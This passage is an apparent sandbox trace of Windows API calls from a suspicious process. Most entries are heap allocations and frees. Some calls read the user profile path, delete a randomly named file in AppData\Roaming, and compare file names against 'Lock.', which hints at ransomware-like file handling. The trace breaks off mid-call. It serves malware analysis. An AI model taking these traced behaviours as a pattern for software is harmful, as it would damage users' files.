[0199.642] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c10 | out: hHeap=0x25c0000) returned 1 [0199.642] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1888 | out: hHeap=0x25c0000) returned 1 [0199.642] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6d00 | out: hHeap=0x25c0000) returned 1 [0199.642] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d20 | out: hHeap=0x25c0000) returned 1 [0199.643] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c60 | out: hHeap=0x25c0000) returned 1 [0199.643] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18b8 | out: hHeap=0x25c0000) returned 1 [0199.643] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6b70 | out: hHeap=0x25c0000) returned 1 [0199.643] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d38 | out: hHeap=0x25c0000) returned 1 [0199.643] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6be8 | out: hHeap=0x25c0000) returned 1 [0199.643] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1948 | out: hHeap=0x25c0000) returned 1 [0199.643] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6b48 | out: hHeap=0x25c0000) returned 1 [0199.643] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e70 | out: hHeap=0x25c0000) returned 1 [0199.643] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3b78 | out: hHeap=0x25c0000) returned 1 [0199.643] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17b8 | out: hHeap=0x25c0000) returned 1 [0199.643] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b69e0 | out: hHeap=0x25c0000) returned 1 [0199.643] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1d0 | out: hHeap=0x25c0000) returned 1 [0199.643] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fa8 | out: hHeap=0x25c0000) returned 1 [0199.643] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3ce0 | out: hHeap=0x25c0000) returned 1 [0199.643] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1898 | out: hHeap=0x25c0000) returned 1 [0199.643] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3a88 | out: hHeap=0x25c0000) returned 1 [0199.643] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1e8 | out: hHeap=0x25c0000) returned 1 [0199.643] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6d28 | out: hHeap=0x25c0000) returned 1 [0199.643] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1858 | out: hHeap=0x25c0000) returned 1 [0199.644] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3c40 | out: hHeap=0x25c0000) returned 1 [0199.644] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab328 | out: hHeap=0x25c0000) returned 1 [0199.644] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa188 | out: hHeap=0x25c0000) returned 1 [0199.644] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3ab0 | out: hHeap=0x25c0000) returned 1 [0199.644] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c08 | out: hHeap=0x25c0000) returned 1 [0199.644] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6cb0 | out: hHeap=0x25c0000) returned 1 [0199.644] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa128 | out: hHeap=0x25c0000) returned 1 [0199.644] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3ba0 | out: hHeap=0x25c0000) returned 1 [0199.644] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16c8 | out: hHeap=0x25c0000) returned 1 [0199.644] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6b20 | out: hHeap=0x25c0000) returned 1 [0199.644] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24d7a58 | out: hHeap=0x25c0000) returned 1 [0199.660] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0199.660] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9708 | out: hHeap=0x25c0000) returned 1 [0199.660] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3c90 | out: hHeap=0x25c0000) returned 1 [0199.660] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1848 | out: hHeap=0x25c0000) returned 1 [0199.660] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3bf0 | out: hHeap=0x25c0000) returned 1 [0199.660] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c18 | out: hHeap=0x25c0000) returned 1 [0199.660] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6440 | out: hHeap=0x25c0000) returned 1 [0199.660] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17d8 | out: hHeap=0x25c0000) returned 1 [0199.660] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6d50 | out: hHeap=0x25c0000) returned 1 [0199.660] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab340 | out: hHeap=0x25c0000) returned 1 [0199.660] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1828 | out: hHeap=0x25c0000) returned 1 [0199.660] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18d8 | out: hHeap=0x25c0000) returned 1 [0199.660] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1908 | out: hHeap=0x25c0000) returned 1 [0199.660] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16e8 | out: hHeap=0x25c0000) returned 1 [0199.661] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ed0 | out: hHeap=0x25c0000) returned 1 [0199.661] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249c7b0 | out: hHeap=0x25c0000) returned 1 [0199.661] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18e8 | out: hHeap=0x25c0000) returned 1 [0199.661] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ff0 | out: hHeap=0x25c0000) returned 1 [0199.661] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e28 | out: hHeap=0x25c0000) returned 1 [0199.661] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3020 | out: hHeap=0x25c0000) returned 1 [0199.661] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1868 | out: hHeap=0x25c0000) returned 1 [0199.661] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d80 | out: hHeap=0x25c0000) returned 1 [0199.661] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f00 | out: hHeap=0x25c0000) returned 1 [0199.661] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa920 | out: hHeap=0x25c0000) returned 1 [0199.661] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e40 | out: hHeap=0x25c0000) returned 1 [0199.661] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9288 | out: hHeap=0x25c0000) returned 1 [0199.661] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f90 | out: hHeap=0x25c0000) returned 1 [0199.661] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0199.661] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f90 [0199.662] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9288 [0199.662] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1868 [0199.662] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e40 [0199.662] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa920 [0199.662] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18e8 [0199.662] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f00 [0199.662] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18e8 | out: hHeap=0x25c0000) returned 1 [0199.662] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xca) returned 0x249c7b0 [0199.662] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18e8 [0199.662] CharUpperBuffW (in: lpsz="UserProfileDir", cchLength=0xe | out: lpsz="USERPROFILEDIR") returned 0xe [0199.662] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d80 [0199.662] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e28 [0199.662] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9ff0 [0199.663] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ed0 [0199.663] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d80 | out: hHeap=0x25c0000) returned 1 [0199.663] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9d80 [0199.663] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16e8 [0199.663] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8bf440, nSize=0x104 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x1d [0199.663] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab340 [0199.663] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d030 [0199.663] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1908 [0199.663] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16e8 | out: hHeap=0x25c0000) returned 1 [0199.663] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249c7b0 | out: hHeap=0x25c0000) returned 1 [0199.663] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18e8 | out: hHeap=0x25c0000) returned 1 [0199.663] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ed0 | out: hHeap=0x25c0000) returned 1 [0199.668] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ff0 | out: hHeap=0x25c0000) returned 1 [0199.668] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d80 | out: hHeap=0x25c0000) returned 1 [0199.668] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e28 | out: hHeap=0x25c0000) returned 1 [0199.668] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f00 | out: hHeap=0x25c0000) returned 1 [0199.668] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa920 | out: hHeap=0x25c0000) returned 1 [0199.668] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e40 | out: hHeap=0x25c0000) returned 1 [0199.668] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18e8 [0199.668] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466e30 [0199.668] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e40 [0199.669] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc0) returned 0x249c7b0 [0199.669] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d030 | out: hHeap=0x25c0000) returned 1 [0199.669] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e40 | out: hHeap=0x25c0000) returned 1 [0199.669] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16e8 [0199.669] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16e8 | out: hHeap=0x25c0000) returned 1 [0199.669] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e40 [0199.669] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e40 | out: hHeap=0x25c0000) returned 1 [0199.669] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e30 | out: hHeap=0x25c0000) returned 1 [0199.669] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18e8 | out: hHeap=0x25c0000) returned 1 [0199.669] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1868 | out: hHeap=0x25c0000) returned 1 [0199.669] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x76) returned 0x24f5278 [0199.669] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz/AppData/Roaming/Ie7x9Fbl.m4a", nBufferLength=0x104, lpBuffer=0x8bee20, lpFilePart=0x8bedfc | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Ie7x9Fbl.m4a", lpFilePart=0x8bedfc*="Ie7x9Fbl.m4a") returned 0x3a [0199.669] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24f5278 | out: hHeap=0x25c0000) returned 1 [0199.670] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Ie7x9Fbl.m4a" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\ie7x9fbl.m4a")) returned 0x2020 [0199.670] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Ie7x9Fbl.m4a", lpFindFileData=0x8bf030 | out: lpFindFileData=0x8bf030*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xeb606510, ftCreationTime.dwHighDateTime=0x1d4cfcf, ftLastAccessTime.dwLowDateTime=0xe1586be0, ftLastAccessTime.dwHighDateTime=0x1d4c687, ftLastWriteTime.dwLowDateTime=0xe1586be0, ftLastWriteTime.dwHighDateTime=0x1d4c687, nFileSizeHigh=0x0, nFileSizeLow=0x168c3, dwReserved0=0xb9a, dwReserved1=0x4, cFileName="Ie7x9Fbl.m4a", cAlternateFileName="")) returned 0xaa5960 [0199.670] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Ie7x9Fbl.m4a" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\ie7x9fbl.m4a")) returned 1 [0199.671] FindNextFileW (in: hFindFile=0xaa5960, lpFindFileData=0x8bf030 | out: lpFindFileData=0x8bf030*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xeb606510, ftCreationTime.dwHighDateTime=0x1d4cfcf, ftLastAccessTime.dwLowDateTime=0xe1586be0, ftLastAccessTime.dwHighDateTime=0x1d4c687, ftLastWriteTime.dwLowDateTime=0xe1586be0, ftLastWriteTime.dwHighDateTime=0x1d4c687, nFileSizeHigh=0x0, nFileSizeLow=0x168c3, dwReserved0=0xb9a, dwReserved1=0x4, cFileName="Ie7x9Fbl.m4a", cAlternateFileName="")) returned 0 [0199.672] FindClose (in: hFindFile=0xaa5960 | out: hFindFile=0xaa5960) returned 1 [0199.672] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249c7b0 | out: hHeap=0x25c0000) returned 1 [0199.672] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1908 | out: hHeap=0x25c0000) returned 1 [0199.672] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab340 | out: hHeap=0x25c0000) returned 1 [0199.672] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9288 | out: hHeap=0x25c0000) returned 1 [0199.672] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f90 | out: hHeap=0x25c0000) returned 1 [0199.672] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0199.672] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f90 [0199.672] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9288 [0199.672] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1908 [0199.672] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab340 [0199.672] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e40 [0199.673] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1868 [0199.673] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa920 [0199.673] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1868 | out: hHeap=0x25c0000) returned 1 [0199.673] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xca) returned 0x249c7b0 [0199.673] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1868 [0199.673] CharUpperBuffW (in: lpsz="UserProfileDir", cchLength=0xe | out: lpsz="USERPROFILEDIR") returned 0xe [0199.673] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f00 [0199.673] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e28 [0199.673] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9d80 [0199.673] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ff0 [0199.673] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f00 | out: hHeap=0x25c0000) returned 1 [0199.673] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9f00 [0199.673] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18e8 [0199.674] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8bf440, nSize=0x104 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x1d [0199.674] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ed0 [0199.674] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d030 [0199.674] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16e8 [0199.674] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18e8 | out: hHeap=0x25c0000) returned 1 [0199.674] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249c7b0 | out: hHeap=0x25c0000) returned 1 [0199.674] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1868 | out: hHeap=0x25c0000) returned 1 [0199.674] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ff0 | out: hHeap=0x25c0000) returned 1 [0199.674] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d80 | out: hHeap=0x25c0000) returned 1 [0199.674] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f00 | out: hHeap=0x25c0000) returned 1 [0199.674] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e28 | out: hHeap=0x25c0000) returned 1 [0199.674] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa920 | out: hHeap=0x25c0000) returned 1 [0199.674] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e40 | out: hHeap=0x25c0000) returned 1 [0199.674] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab340 | out: hHeap=0x25c0000) returned 1 [0199.674] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1868 [0199.675] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466e30 [0199.675] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab340 [0199.675] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc0) returned 0x249c7b0 [0199.675] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d030 | out: hHeap=0x25c0000) returned 1 [0199.675] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab340 | out: hHeap=0x25c0000) returned 1 [0199.675] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18e8 [0199.675] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18e8 | out: hHeap=0x25c0000) returned 1 [0199.675] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab340 [0199.675] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab340 | out: hHeap=0x25c0000) returned 1 [0199.675] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e30 | out: hHeap=0x25c0000) returned 1 [0199.675] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1868 | out: hHeap=0x25c0000) returned 1 [0199.675] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1908 | out: hHeap=0x25c0000) returned 1 [0199.675] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab340 [0199.676] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1908 [0199.676] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e40 [0199.676] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa920 [0199.676] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1868 [0199.676] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e28 [0199.676] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1868 | out: hHeap=0x25c0000) returned 1 [0199.676] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e28 | out: hHeap=0x25c0000) returned 1 [0199.676] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa920 | out: hHeap=0x25c0000) returned 1 [0199.676] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e40 | out: hHeap=0x25c0000) returned 1 [0199.676] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1908 | out: hHeap=0x25c0000) returned 1 [0199.676] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x76) returned 0x24f5278 [0199.676] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz/AppData/Roaming/Ie7x9Fbl.m4a", nBufferLength=0x104, lpBuffer=0x8bf664, lpFilePart=0x8bf658 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Ie7x9Fbl.m4a", lpFilePart=0x8bf658*="Ie7x9Fbl.m4a") returned 0x3a [0199.676] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24f5278 | out: hHeap=0x25c0000) returned 1 [0199.676] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Ie7x9Fbl.m4a" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\ie7x9fbl.m4a")) returned 0xffffffff [0199.677] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249c7b0 | out: hHeap=0x25c0000) returned 1 [0199.677] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16e8 | out: hHeap=0x25c0000) returned 1 [0199.677] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ed0 | out: hHeap=0x25c0000) returned 1 [0199.677] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9288 | out: hHeap=0x25c0000) returned 1 [0199.677] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab340 | out: hHeap=0x25c0000) returned 1 [0199.680] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f90 | out: hHeap=0x25c0000) returned 1 [0199.680] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0199.680] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d760 | out: hHeap=0x25c0000) returned 1 [0199.680] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0199.680] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0199.680] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16e8 [0199.680] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1908 [0199.681] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f90 [0199.681] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab340 [0199.681] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1868 [0199.681] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18e8 [0199.681] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18e8 | out: hHeap=0x25c0000) returned 1 [0199.681] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9288 [0199.681] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1868 | out: hHeap=0x25c0000) returned 1 [0199.681] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ed0 [0199.681] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1868 [0199.681] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e40 [0199.681] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1868 | out: hHeap=0x25c0000) returned 1 [0199.681] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="JdjU4gAsI 0_L.gif", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0199.681] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="djU4gAsI 0_L.gif", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0199.681] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="jU4gAsI 0_L.gif", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0199.682] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="U4gAsI 0_L.gif", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0199.682] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="4gAsI 0_L.gif", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0199.682] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="gAsI 0_L.gif", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0199.682] CompareStringW 